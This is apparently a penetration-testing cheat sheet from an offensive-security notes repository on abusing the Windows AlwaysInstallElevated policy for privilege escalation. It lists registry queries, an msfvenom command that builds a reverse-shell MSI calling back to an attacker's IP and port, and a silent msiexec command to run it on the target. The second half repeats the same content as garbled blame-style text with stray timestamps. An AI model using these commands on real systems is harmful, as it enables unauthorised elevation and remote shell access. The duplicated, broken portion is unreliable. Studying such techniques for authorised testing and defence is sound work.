killchain-compendium/exploit/windows/docs/always_installed_elevated.md

# AlwaysInstalledElevated

* Watch out for `AlwaysInstalledElevated` keys inside the registry via
```sh
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```
* Prepare reverse shell on attacker as an msi file
```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP> LPORT=<attacker-Port> -f msi -o shell.msi
```
* start the msi on target
```sh
msiexec /quiet /qn /i C:\Temp\shell.msi
```

## Set Registry Keys
* Alternative method
```sh
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
```
bump 2021-10-16 00:40:15 +02:00			`# AlwaysInstalledElevated`

			* Watch out for `AlwaysInstalledElevated` keys inside the registry via
			```sh
			`reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated`
			`reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated`
			```
			`* Prepare reverse shell on attacker as an msi file`
			```
			`msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP> LPORT=<attacker-Port> -f msi -o shell.msi`
			```
			`* start the msi on target`
			```sh
bump 2021-10-23 02:03:06 +02:00			`msiexec /quiet /qn /i C:\Temp\shell.msi`
			```

			`## Set Registry Keys`
			`* Alternative method`
			```sh
			`reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer`
			`reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer`
bump 2021-10-16 00:40:15 +02:00			```